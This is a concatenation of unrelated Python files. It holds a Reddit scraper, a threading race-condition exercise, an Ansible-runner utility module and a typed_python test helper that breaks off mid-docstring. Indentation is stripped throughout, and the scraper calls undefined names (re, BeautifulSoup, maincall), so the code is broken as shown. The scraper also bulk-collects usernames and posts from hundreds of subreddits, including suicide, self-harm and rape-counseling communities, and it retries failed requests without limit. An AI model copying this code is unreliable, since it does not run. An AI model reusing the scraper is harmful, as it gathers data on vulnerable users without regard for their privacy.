from bs4 import SoupStrainer
import os
import httplib2
from multiprocessing import Pool
c=0
import requests
from datetime import datetime
import multiprocessing
from multiprocessing import current_process
import time
import os
import sys
FORMAT = '%d-%m-%Y %H:%M:%S'
my=open('log.txt','a',encoding='utf-8')
def make_soup2(url):
match=re.compile('https://|http://|www.|.com|.in|.org|gov.in')
my.write('\nnot stuck1'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
if re.search(match,url):
while(True):
try:
r = requests.get(url, timeout=5) #number of seconds to wait for response before throwing exception
break
except:
print("timed out")
continue
page =BeautifulSoup(r.text, parse_only=SoupStrainer('div'))
return page
else:
return None
def make_soup1(url):
match=re.compile('https://|http://|www.|.com|.in|.org|gov.in')
my.write('\nnot stuck1'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
if re.search(match,url):
while(True):
try:
try:
r = requests.get(url, timeout=5) #number of seconds to wait for response before throwing exception
my.write('\nnot stuck2'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
page =BeautifulSoup(r.text, parse_only=SoupStrainer('div'))
my.write('\nnot stuck3'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
break
except requests.exceptions.Timeout:
print("timed out")
except:
continue
return page
else:
return None
def make_soup(s):
match=re.compile('https://|http://|www.|.com|.in|.org|gov.in')
#my.write(s)
if re.search(match,s):
while(True):
try:
http = httplib2.Http()
#my.write('\nnot stuck1'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
break
except:
#print('stuck1')
continue
while(True):
try:
status, response = http.request(s)
#my.write('\nnot stuck2'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
break
except:
#print('stuck2')
continue
while(True):
try:
page = BeautifulSoup(response,"html.parser",parse_only=SoupStrainer('div'))
#my.write('\nnot stuck3'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
break
except:
#print('stuck3')
continue
return page
else:
return None
def test_internet():
#my.write('\nin test_internet'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
while(True):
try:
http = httplib2.Http()
status, response = http.request("https://www.google.com")
#my.write('\nSUCCESS test_internet'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
break
except:
continue
def parse1(s):
#my.write('\nin parse'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
global c
temp_set=set()
soup=make_soup(s)
if(soup!=None):
for div in soup.find_all('div',class_=[ "thing" , "id-t3_3ua12m" ,"linkflair" , "linkflair-normal" , "odd" , "link"]):
try:
if(div.p!=None and div.p.next_sibling!=None and div.p.next_sibling.next_sibling!=None):
x=div.p.next_sibling.next_sibling.next_sibling['class']
#print(x)
if(x[0]=='entry'):
element='\nPROMPT '+str(c+1)+'\n'
if(div.p.next_sibling.next_sibling.next_sibling!=None and div.p.next_sibling.next_sibling.next_sibling.p!=None and div.p.next_sibling.next_sibling.next_sibling.p.a!=None):
element=element+div.p.next_sibling.next_sibling.next_sibling.p.a.string+'\n'
element=element+div.p.next_sibling.next_sibling.next_sibling.p.a['href']+'\n'
if(div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'})!=None and div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time!=None):
element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time['datetime']+'\t'
element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time['title']+'\t'
element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time.string+'\n'
if(div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'})!=None and div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).a!=None):
element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).a.string+'\n'
element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).text+'\n'
if(div.div.find('div',{'class':'score likes'})!=None):
element=element+'score likes '+div.div.find('div',{'class':'score likes'}).string+'\t'
element=element+'score dislikes '+div.div.find('div',{'class':'score dislikes'}).string+'\t'
element=element+'score unvoted '+div.div.find('div',{'class':'score unvoted'}).string+'\n\n'
f.write(element)
c=c+1
elif(x[0]=='thumbnail'):
element='\nPROMPT '+str(c+1)+'\n'
if(div.find('div',{'class':'entry unvoted'})!=None and div.find('div',{'class':'entry unvoted'}).p!=None and div.find('div',{'class':'entry unvoted'}).p.a!=None and div.find('div',{'class':'entry unvoted'}).p.a.string!=None):
element=element+div.find('div',{'class':'entry unvoted'}).p.a.string+'\n'
element=element+div.find('div',{'class':'entry unvoted'}).p.a['href']+'\n'
if(div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'})!=None and div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time != None):
element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time['datetime']+'\t'
element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time['title']+'\t'
element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time.string+'\n'
if(div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).a!=None):
element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).a.string+'\n'
element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).text+'\n'
if(div.p.next_sibling.next_sibling.find('div',{'class':'score likes'})!=None and div.p.next_sibling.next_sibling.find('div',{'class':'score dislikes'})!=None and div.p.next_sibling.next_sibling.find('div',{'class':'score unvoted'})!=None):
element=element+'score likes '+div.p.next_sibling.next_sibling.find('div',{'class':'score likes'}).string+'\t\t'
element=element+'score dislikes '+div.p.next_sibling.next_sibling.find('div',{'class':'score dislikes'}).string+'\t\t'
element=element+'score unvoted '+div.p.next_sibling.next_sibling.find('div',{'class':'score unvoted'}).string+'\n'
#my.write('\nSUCCESS PARSE 1'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
f.write(element)
c=c+1
except:
my.write('ERROR'+datetime.now().strftime(FORMAT)+'\n')
continue
def count_next_of_current(s,m):
#my.write('\nin count_next_of current'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
soup=make_soup(s)
y='https://www.reddit.com/r/'+m+'/'+select_tab+'/?count='
match=re.compile(y)
for link in soup.find_all('a',{'rel':['next']}):
href=link['href']
#my.write('\nSUCCESS count_next_of current'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
return href
def read_reddit_images(change_file_number,m,x):
#my.write('\nin read_reddit_images'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
global f
global select_tab
select_tab=x
x=m+'_'+select_tab+'.txt'
#test_internet()
s='https://www.reddit.com/r/'+m+'/'+select_tab
soup=make_soup(s)
f=open(x,'a',encoding='utf-8')
f.write('\n\n\n\niteration number '+str(change_file_number)+' '+datetime.now().strftime(FORMAT)+'\n\n')
maximum_number_of_next_pages=5
parse1(s)
count=0
print('for '+m+' '+select_tab+' current page number is'+'\n'+str(count))
while(count<maximum_number_of_next_pages):
#test_internet()
s=count_next_of_current(s,m)
if(s!=None):
parse1(s)
count=count+1
print(count)
else:
break
f.write('\n\niteration number '+str(change_file_number)+' '+datetime.now().strftime(FORMAT)+'\n\n')
f.close()
#my.write('\nSUCCESS read_reddit_images'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
def main(m,i):
#my.write('\nin maincall'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
my.write('\n'+str(type(m))+' '+m+' '+str(type(i))+' '+str(i)+'\n')
read_reddit_images(i,m,'new')
read_reddit_images(i,m,'hot')
read_reddit_images(i,m,'top')
#read_reddit_images(i,m,'rising')
#read_reddit_images(i,m,'controversial')
#read_reddit_images(i,m,'gilded')
my.write('\n'+str(type(m))+' '+m+' '+str(type(i))+' '+str(i)+' SUCCESS SUCCESS SUCCESS\n')
#my.write('\nSUCCESS maincall'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
def subs(b):
my.write('\nin subs'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
test_internet()
t=open("mytext.txt",'r')
i=t.read()
temp=int(i)
temp=temp+1
t.close()
t=open("mytext.txt",'w')
t.write(str(temp))
t.close()
for k in b:
maincall(k,i)
my.write('\nSUCCESS subs'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
def list_subreddits():
my.write('\nin list_subreddits'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
test_internet()
b=[]
b=b+['buildapc','offmychest','datamining','DebateReligion','DecidingToBeBetter','depression','ECE','Economics','eebooks','electronics','Feminism','findareddit']
b=b+['PoliticalDiscussion','books','shittyaskscience','AskScienceFiction','linux','ProgrammerHumor','holdmybeer','socialism','InternetIsBeautiful','changemyview']
b=b+['AskScienceDiscussion','AskSocialScience','askphotography','badcode','bestofTLDR','biology','bookquotes','bugs','C_Programming','chipdesign','coding']
b=b+['compilers','complexsystems','compression','computerforensics','computers','computerscience','cosmology','coursearea','Cplusplus','cpp','CppForbeginners']
b=b+['CrappyDesign','CrazyIdeas','crypto','cryptography','cs50','csbooks','cscareerquestions','dailyprogrammer','dailyscripts','darkinternet','dataisbeautiful']
b=b+['relationships','showerthoughts','explainlikeimfive','technology','science','music','india','conspiracy','talesfromtechsupport','sex','AskWomen']
b=b+['24hoursupport','3amjokes','AcademicPhilosophy','AcademicPsychology','AMA','AndroidQuestions','Android','androiddev','Anger','answers','Anxiety']
b=b+['Ask_Politics','AskAnthropology','AskComputerScience','AskElectronics','AskEngineers','AskHistorians','asklinguistics','askmath','AskMen','AskPhysics']
b=b+['askscience','writingprompts','DIY','LifeProTips','bodybuilding','GetMotivated','TrueReddit','teenagers','AskHistorians','programming','NoStupidQuestions']
b=b+['Foodforthought','illegaltorrents','improvevocab','intel','intelligence','interview','iWantToLearn','java','javacodegeeks','javahelp','javascript','javaTIL']
b=b+['Freethought','getdisciplined','GetStudying','goldredditsays','grammar','GraphicsProgramming','hacking','HomeworkHelp','humanism','ideasfortheadmins']
b=b+['learnjava','learnmath','learnjavascript','linux','linux4noobs','linuxquestions','literature','logic','MachineLearning','math','mathbooks','MathHelp']
b=b+['meditation','mysql','networking','Neuropsychology','obvious','opengl','osdev','perl','philosophy','philosophyofScience','privacy','productivity']
b=b+['programmingchallenges','PhsychologicalTricks','puzzles','Python','quotes','rage','rational','riddles','selfimprovement','shittyideas','shittyprogramming']
b=b+['socialskills','software','softwarearchitecture','softwaredevelopment','softwaregore','sysadmin','systems','talesfromtechsupport','techsupport','bestof']
b=b+['worldnews','lifehacks','AskHistorians','programming','politics','compsci','javahelp','learnprogramming','cpp_questions','physics','writingprompts']
b=b+['getmotivated','news','gadgets','InternetIsBeautiful','india','science','IAmA','askscience','jokes','explainlikeimfive','technology','showerthoughts']
b=b+['movies','documentaries','dataisbeautiful','history','AskReddit','funny','todayilearned','pics','books','space','philosophy','learnpython','askscience']
b=b+['TrueAskReddit','Web_Development','webdev','worldnews','news','askreddit','learnprogramming','compsci']#major list, Once a week
b=[]
b=['24hoursupport','3amjokes','ADHD','AMA','AcademicPhilosophy','AcademicPsychology','Aerospace','Android','AndroidQuestions','Anger','Anxiety',
'AskAnthropology','AskComputerScience','AskElectronics','AskEngineers','AskHR','AskHistorians','AskMen','AskPhysics','AskReddit','AskScienceDiscussion',
'AskScienceFiction','AskSocialScience','AskWomen','Ask_Politics','Bash','BehavioralEconomics','BigDataJobs','BipolarReddit','CAD','C_Programming',
'ComputerScience','Confession','CoverTheWorld','Cplusplus','CppForbeginners','CrappyDesign','CrazyIdeas','DIY','DIYCompSci','DailyProgrammer','DeadBedrooms',
'DebateReligion','DecidingToBeBetter','DigitalNomad','DoesNotTranslate','ECE','Economics','EngineeringStudents','Entrepreneur','ExNoContact','FEA','FE_Exam',
'Feminism','FluidMechanics','Foodforthought','FoundWords','Freethought','GetMotivated','GetStudying','GraphicsProgramming','HITsWorthTurkingFor','HTMLBattles',
'HomeworkHelp','HowsYourJob','IAmA','IOPsychology','InternetIsBeautiful','LaTeX','LanguageLearning','LearnANewLanguage','LearnJava','LearnJavaScript',
'LifeProTips','LinguisticsHumor','LongDistance','MachineLearning','Manufacturing','MathHelp','Meditation','NetworkingJobs','Neuropsychology','NoStupidQuestions',
'ObjectiveC','PCMasterRace','PLC','PhilosophyofScience','PhsychologicalTricks','PoliticalDiscussion','Polyamory','PrintedCircuitBoard','Progether',
'ProgrammerHumor','Proofreading','Python','RapeCounseling','RetailManagement','STEMdents','SWORDS','SWResources','SampleSize','SanctionedSuicide','Seduction',
'SiblingSupport','Statistics','SuicideWatch','Swift','SysadminJobs','TechNews','ThermalPerformance','Tinder','TinyCode','TowerOfBabel','TrueAskReddit',
'TrueReddit','Unix','VentureBiotech','WeMetOnline','Web_Development','WhatsTheWord','YoungJobs','academicpsychology','academicpublishing','accounting','advice',
'androiddev','translator','answers','asklinguistics','askmath','askphotography','askreddit','askscience','assistance','astronomy','audiology','autism','badcode',
'badlinguistics','beermoney','behavioralmedicine','behaviortherapy','bestof','bestofTLDR','bioengineering','biology','biotech','bodybuilding','bookquotes',
'books','breadboard','bugs','buildapc','business','careerguidance','cfd','changemyview','chemicalengineering','chipdesign','civilengineering','cloudcomputing',
'coding','coffeescript','cogneuro','cogneurocogsci','cognitivelinguistics','cogsci','compilers','complexsystems','compling','compression','compsci',
'computerforensics','computers','computerscience','conlangs','conspiracy','construction','cosmology','coursearea','cpp','cpp_questions','crypto','cryptography',
'cs50','csbooks','cscareerquestions','csharp','css','dae','dailyprogrammer','dailyscripts','darkinternet','dataisbeautiful','datamining','dementia','depression',
'diy','documentaries','dotnet','downsyndrome','dyslexia','economics','education','eebooks','electricalengineering','electronics','engineering',
'engineeringtechnology','entrepreneur','epidemiology','etymology','eurodiversity','everythingscience','evolution','evopsych','explainlikeimfive','favors',
'finance','financialindependence','findareddit','forhire','forth','freelance','freelanceUK','freelanceWriters','funny','gadgets','genetics','getdisciplined',
'getemployed','getmotivated','getting_over_it','goldredditsays','grammar','grammarwriting','graphic_design','hacking','hardware','history','holdmybeer',
'homeworkhelp','html','htmlbasics','humanism','hwstartups','hypotheticalsituation','iWantToLearn','ideasfortheadmins','illegaltorrents','improvevocab','india',
'ineedafavor','intel','intelligence','interview','inventions','iwantoutjobs','java','javaTIL','javacodegeeks','javahelp','javascript','jobbit','jobsearchhacks',
'jokes','jquery','languagetechnology','learnjava','learnjavascript','learnmath','learnprogramming','learnpython','lectures','lifehacks','linguistics','linux',
'linux4noobs','linuxquestions','literature','logic','machinelearning','marketing','masculism','math','mathbooks','mathematics','mathpsych','matlab',
'mechanicalengineering','medicine','meditation','mentalhealth','mentors','metalworking','microsoft','mmfb','motivation','movies','music','mysql','needadvice',
'networking','neuro','neurodiversity','neurophilosophy','neuropsychology','newproducts','news','newtoreddit','nonprofit_jobs','nootropics','obvious',
'occupationaltherapy','ocd','offmychest','opengl','osdev','parkrangers','perl','philosophy','philosophyofScience','philosophyofscience','php','physics','pics',
'politics','privacy','product_design','productivity','programbattles','programming','programmingbuddies','programmingchallenges','psychiatry','psychology',
'psychopharmacology','psychotherapy','psychscience','puzzles','python','quotes','rage','rational','reasonstolive','rehabtherapy','relationship_advice',
'relationships','resumes','riddles','robotics','ruby','saneorpsycho','schizophrenia','science','scientificresearch','self','selfhelp','selfimprovement','sex',
'shittyaskscience','shittyideas','shittyprogramming','showerthoughts','simpleliving','slp','socialism','socialmedia','socialskills','sociology','software',
'softwarearchitecture','softwaredevelopment','softwaregore','solotravel','space','specialed','startups','stopselfharm','suicidology','sysadmin','systems',
'talesfromtechsupport','technology','techsupport','teenagers','testimonials','themixednuts','thisismyjob','tipofmytongue','todayilearned','tr',
'translationstudies','travel','tutor','ultralight','undelete','undeleteShadow','undergraduateresearch','uniqueminds','visualbasic','web_programming','webdev',
'whatisthis','whatstheword','windows','windowsazure','womenEngineers','words','work','workonline','worldnews','writingprompts']#major list, Once a week
l=set()
for k in b:
l.add(k)
b=[]
for k in l:
b.append(k)
b.sort()
subs(b)
my.write('\nSUCCESS list_subreddits'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
#xcv=0
#for k in b:
# xcv=xcv+1
# print(str(xcv)+"\t\t"+k)
#list_subreddits()
if __name__ == "__main__":
processes = []
arguments = sys.argv[2:]#it was b
for x in arguments:
print(x)
p = multiprocessing.Process(target=main, args=(str(x),int(sys.argv[1]), ))
p.start()
processes.append(p)
for p in processes:
p.join()
# my.close()
|
foo.py
|
# Python 3.3.3 and 2.7.6
# python fo.py
from threading import Thread
# Potentially useful thing:
# In Python you "import" a global variable, instead of "export"ing it when you declare it
# (This is probably an effort to make you feel bad about typing the word "global")
i = 0
def incrementingFunction():
global i
# TODO: increment i 1_000_000 times
for babb in range(0,1000000):
i+=1
def decrementingFunction():
global i
# TODO: decrement i 1_000_000 times
for babb in range(0,1000000):
i-=1
def main():
# TODO: Something is missing here (needed to print i)
global i
incrementing = Thread(target = incrementingFunction, args = (),)
decrementing = Thread(target = decrementingFunction, args = (),)
# TODO: Start both threads
incrementing.start()
decrementing.start()
incrementing.join()
decrementing.join()
print("The magic number is %d" % (i))
main()
|
utils.py
|
import json
import sys
import re
import os
import stat
import fcntl
import shutil
import hashlib
import tempfile
import subprocess
import base64
import threading
import pipes
import uuid
import codecs
import zipfile
try:
from collections.abc import Iterable, Mapping
except ImportError:
from collections import Iterable, Mapping
from io import BytesIO, StringIO
from six import string_types, PY2, PY3, text_type, binary_type
class Bunch(object):
'''
Collect a bunch of variables together in an object.
This is a slight modification of Alex Martelli's and Doug Hudgeon's Bunch pattern.
'''
def __init__(self, **kwargs):
self.update(**kwargs)
def update(self, **kwargs):
self.__dict__.update(kwargs)
def get(self, key):
return self.__dict__.get(key)
def isplaybook(obj):
'''
Inspects the object and returns if it is a playbook
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is a list and False if it is not
'''
return isinstance(obj, Iterable) and (not isinstance(obj, string_types) and not isinstance(obj, Mapping))
def isinventory(obj):
'''
Inspects the object and returns if it is an inventory
Args:
obj (object): The object to be inspected by this function
Returns:
boolean: True if the object is an inventory dict and False if it is not
'''
return isinstance(obj, Mapping) or isinstance(obj, string_types)
def check_isolation_executable_installed(isolation_executable):
'''
Check that process isolation executable (e.g. podman, docker, bwrap) is installed.
'''
cmd = [isolation_executable, '--version']
try:
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
proc.communicate()
return bool(proc.returncode == 0)
except (OSError, ValueError) as e:
if isinstance(e, ValueError) or getattr(e, 'errno', 1) != 2: # ENOENT, no such file or directory
raise RuntimeError(f'{isolation_executable} unavailable for unexpected reason.')
return False
def stream_dir(directory):
buf = BytesIO()
with zipfile.ZipFile(buf, 'w', compression=zipfile.ZIP_DEFLATED, allowZip64=True) as archive:
if directory:
for dirpath, dirs, files in os.walk(directory):
relpath = os.path.relpath(dirpath, directory)
if relpath == ".":
relpath = ""
for fname in files:
archive.write(os.path.join(dirpath, fname), arcname=os.path.join(relpath, fname))
archive.close()
payload = buf.getvalue()
return b'\n'.join((json.dumps({'zipfile': len(payload)}).encode('utf-8'), payload))
def unstream_dir(data, directory):
buf = BytesIO(data)
with zipfile.ZipFile(buf, 'r') as archive:
# Fancy extraction in order to preserve permissions
# https://www.burgundywall.com/post/preserving-file-perms-with-python-zipfile-module
for info in archive.infolist():
archive.extract(info.filename, path=directory)
out_path = os.path.join(directory, info.filename)
perm = info.external_attr >> 16
os.chmod(out_path, perm)
def dump_artifact(obj, path, filename=None):
'''
Write the artifact to disk at the specified path
Args:
obj (string): The string object to be dumped to disk in the specified
path. The artifact filename will be automatically created
path (string): The full path to the artifacts data directory.
filename (string, optional): The name of file to write the artifact to.
If the filename is not provided, then one will be generated.
Returns:
string: The full path filename for the artifact that was generated
'''
p_sha1 = None
if not os.path.exists(path):
os.makedirs(path, mode=0o700)
else:
p_sha1 = hashlib.sha1()
p_sha1.update(obj.encode(encoding='UTF-8'))
if filename is None:
fd, fn = tempfile.mkstemp(dir=path)
else:
fn = os.path.join(path, filename)
if os.path.exists(fn):
c_sha1 = hashlib.sha1()
with open(fn) as f:
contents = f.read()
c_sha1.update(contents.encode(encoding='UTF-8'))
if not os.path.exists(fn) or p_sha1.hexdigest() != c_sha1.hexdigest():
lock_fp = os.path.join(path, '.artifact_write_lock')
lock_fd = os.open(lock_fp, os.O_RDWR | os.O_CREAT, stat.S_IRUSR | stat.S_IWUSR)
fcntl.lockf(lock_fd, fcntl.LOCK_EX)
try:
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR)
f.write(str(obj))
finally:
fcntl.lockf(lock_fd, fcntl.LOCK_UN)
os.close(lock_fd)
os.remove(lock_fp)
return fn
def cleanup_artifact_dir(path, num_keep=0):
# 0 disables artifact dir cleanup/rotation
if num_keep < 1:
return
all_paths = sorted([os.path.join(path, p) for p in os.listdir(path)],
key=lambda x: os.path.getmtime(x))
total_remove = len(all_paths) - num_keep
for f in range(total_remove):
shutil.rmtree(all_paths[f])
def dump_artifacts(kwargs):
'''
Introspect the kwargs and dump objects to disk
'''
private_data_dir = kwargs.get('private_data_dir')
if not private_data_dir:
private_data_dir = tempfile.mkdtemp()
kwargs['private_data_dir'] = private_data_dir
if not os.path.exists(private_data_dir):
raise ValueError('private_data_dir path is either invalid or does not exist')
if 'role' in kwargs:
role = {'name': kwargs.pop('role')}
if 'role_vars' in kwargs:
role['vars'] = kwargs.pop('role_vars')
play = [{'hosts': kwargs.pop('hosts', 'all'), 'roles': [role]}]
if kwargs.pop('role_skip_facts', False):
play[0]['gather_facts'] = False
kwargs['playbook'] = play
if 'envvars' not in kwargs:
kwargs['envvars'] = {}
roles_path = kwargs.pop('roles_path', None)
if not roles_path:
roles_path = os.path.join(private_data_dir, 'roles')
else:
roles_path += ':{}'.format(os.path.join(private_data_dir, 'roles'))
kwargs['envvars']['ANSIBLE_ROLES_PATH'] = roles_path
obj = kwargs.get('playbook')
if obj and isplaybook(obj):
path = os.path.join(private_data_dir, 'project')
kwargs['playbook'] = dump_artifact(json.dumps(obj), path, 'main.json')
obj = kwargs.get('inventory')
if obj and isinventory(obj):
path = os.path.join(private_data_dir, 'inventory')
if isinstance(obj, Mapping):
kwargs['inventory'] = dump_artifact(json.dumps(obj), path, 'hosts.json')
elif isinstance(obj, string_types):
if not os.path.exists(obj):
kwargs['inventory'] = dump_artifact(obj, path, 'hosts')
for key in ('envvars', 'extravars', 'passwords', 'settings'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(json.dumps(obj), path, key)
kwargs.pop(key)
for key in ('ssh_key', 'cmdline'):
obj = kwargs.get(key)
if obj and not os.path.exists(os.path.join(private_data_dir, 'env', key)):
path = os.path.join(private_data_dir, 'env')
dump_artifact(str(kwargs[key]), path, key)
kwargs.pop(key)
def collect_new_events(event_path,old_events):
'''
Collect new events for the 'events' generator property
'''
dir_events = os.listdir(event_path)
dir_events_actual = []
for each_file in dir_events:
if re.match("^[0-9]+-.+json$", each_file):
if '-partial' not in each_file and each_file not in old_events.keys() :
dir_events_actual.append(each_file)
dir_events_actual.sort(key=lambda filenm: int(filenm.split("-", 1)[0]))
for event_file in dir_events_actual:
with codecs.open(os.path.join(event_path, event_file), 'r', encoding='utf-8') as event_file_actual:
try:
event = json.load(event_file_actual)
except ValueError:
break
old_events[event_file] = True
yield event, old_events
class OutputEventFilter(object):
'''
File-like object that looks for encoded job events in stdout data.
'''
EVENT_DATA_RE = re.compile(r'\x1b\[K((?:[A-Za-z0-9+/=]+\x1b\[\d+D)+)\x1b\[K')
def __init__(self, handle, event_callback,
suppress_ansible_output=False, output_json=False):
self._event_callback = event_callback
self._counter = 0
self._start_line = 0
self._handle = handle
self._buffer = StringIO()
self._last_chunk = ''
self._current_event_data = None
self.output_json = output_json
self.suppress_ansible_output = suppress_ansible_output
def flush(self):
self._handle.flush()
def write(self, data):
self._buffer.write(data)
# keep a sliding window of the last chunk written so we can detect
# event tokens and determine if we need to perform a search of the full
# buffer
should_search = '\x1b[K' in (self._last_chunk + data)
self._last_chunk = data
# Only bother searching the buffer if we recently saw a start/end
# token (\x1b[K)
while should_search:
value = self._buffer.getvalue()
match = self.EVENT_DATA_RE.search(value)
if not match:
break
try:
base64_data = re.sub(r'\x1b\[\d+D', '', match.group(1))
event_data = json.loads(base64.b64decode(base64_data).decode('utf-8'))
except ValueError:
event_data = {}
event_data = self._emit_event(value[:match.start()], event_data)
if not self.output_json:
stdout_actual = event_data['stdout'] if 'stdout' in event_data else None
else:
stdout_actual = json.dumps(event_data)
remainder = value[match.end():]
self._buffer = StringIO()
self._buffer.write(remainder)
if stdout_actual and stdout_actual != "{}":
if not self.suppress_ansible_output:
sys.stdout.write(
stdout_actual.encode('utf-8') if PY2 else stdout_actual
)
sys.stdout.write("\n")
sys.stdout.flush()
self._handle.write(stdout_actual + "\n")
self._handle.flush()
self._last_chunk = remainder
else:
# Verbose stdout outside of event data context
if data and '\n' in data and self._current_event_data is None:
# emit events for all complete lines we know about
lines = self._buffer.getvalue().splitlines(True) # keep ends
remainder = None
# if last line is not a complete line, then exclude it
if '\n' not in lines[-1]:
remainder = lines.pop()
# emit all complete lines
for line in lines:
self._emit_event(line)
if not self.suppress_ansible_output:
sys.stdout.write(
line.encode('utf-8') if PY2 else line
)
self._handle.write(line)
self._handle.flush()
self._buffer = StringIO()
# put final partial line back on buffer
if remainder:
self._buffer.write(remainder)
def close(self):
value = self._buffer.getvalue()
if value:
self._emit_event(value)
self._buffer = StringIO()
self._event_callback(dict(event='EOF'))
self._handle.close()
def _emit_event(self, buffered_stdout, next_event_data=None):
next_event_data = next_event_data or {}
if self._current_event_data:
event_data = self._current_event_data
stdout_chunks = [buffered_stdout]
elif buffered_stdout:
event_data = dict(event='verbose')
stdout_chunks = buffered_stdout.splitlines(True)
else:
event_data = dict()
stdout_chunks = []
for stdout_chunk in stdout_chunks:
if event_data.get('event') == 'verbose':
event_data['uuid'] = str(uuid.uuid4())
self._counter += 1
event_data['counter'] = self._counter
event_data['stdout'] = stdout_chunk[:-2] if len(stdout_chunk) > 2 else ""
n_lines = stdout_chunk.count('\n')
event_data['start_line'] = self._start_line
event_data['end_line'] = self._start_line + n_lines
self._start_line += n_lines
if self._event_callback:
self._event_callback(event_data)
if next_event_data.get('uuid', None):
self._current_event_data = next_event_data
else:
self._current_event_data = None
return event_data
def open_fifo_write(path, data):
'''open_fifo_write opens the fifo named pipe in a new thread.
This blocks the thread until an external process (such as ssh-agent)
reads data from the pipe.
'''
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)).start()
def args2cmdline(*args):
return ' '.join([pipes.quote(a) for a in args])
def ensure_str(s, encoding='utf-8', errors='strict'):
"""
Copied from six==1.12
Coerce *s* to `str`.
For Python 2:
- `unicode` -> encoded to `str`
- `str` -> `str`
For Python 3:
- `str` -> `str`
- `bytes` -> decoded to `str`
"""
if not isinstance(s, (text_type, binary_type)):
raise TypeError("not expecting type '%s'" % type(s))
if PY2 and isinstance(s, text_type):
s = s.encode(encoding, errors)
elif PY3 and isinstance(s, binary_type):
s = s.decode(encoding, errors)
return s
def sanitize_container_name(original_name):
"""
Docker and podman will only accept certain characters in container names
This takes a given name from user-specified values and replaces the
invalid characters so it can be used in docker/podman CLI commands
"""
return re.sub('[^a-zA-Z0-9_-]', '_', text_type(original_name))
|
test_util.py
|
# Copyright 2017-2020 typed_python Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import psutil
import time
import threading
import tempfile
import pickle
import subprocess
import sys
import os
from typed_python import Entrypoint, SerializationContext
def currentMemUsageMb(residentOnly=True):
if residentOnly:
return psutil.Process().memory_info().rss / 1024 ** 2
else:
return psutil.Process().memory_info().vms / 1024 ** 2
def compilerPerformanceComparison(f, *args, assertResultsEquivalent=True):
"""Call 'f' with args in entrypointed/unentrypointed form and benchmark
If 'assertResultsEquivalent' check that the two results are '=='.
Returns:
(elapsedCompiled, elapsedUncompiled)
"""
fEntrypointed = Entrypoint(f)
fEntrypointed(*args)
t0 = time.time()
compiledRes = fEntrypointed(*args)
t1 = time.time()
uncompiledRes = f(*args)
t2 = time.time()
if assertResultsEquivalent:
assert compiledRes == uncompiledRes, (compiledRes, uncompiledRes)
return (t1 - t0, t2 - t1)
def estimateFunctionMultithreadSlowdown(f, threadcount=2):
t0 = time.time()
f()
t1 = time.time()
threads = [threading.Thread(target=f) for _ in range(threadcount)]
for t in threads:
t.start()
for t in threads:
t.join()
t2 = time.time()
return (t2 - t1) / (t1 - t0)
def instantiateFiles(filesToWrite, tf):
"""Write out a dict of files to a temporary directory.
Args:
filesToWrite - a dict from filename to file contents. Don't try to use
subdirectories yet - it won't be cross platform.
tf - the temporary directory to write into
"""
for fname, contents in filesToWrite.items():
fullname = os.path.join(tf, fname)
dirname = os.path.dirname(fullname)
if not os.path.exists(dirname):
os.makedirs(dirname)
with open(fullname, "w") as f:
f.write(
"from typed_python import *\n"
+ contents
)
def callFunctionInFreshProcess(func, argTup, compilerCacheDir=None):
"""Return the value of a function evaluated on some arguments in a subprocess.
We use this to test the semantics of anonymous functions and classes in a process
that didn't create those obects.
Args:
func - the function object to call
argTup - a tuple of arguments
Returns:
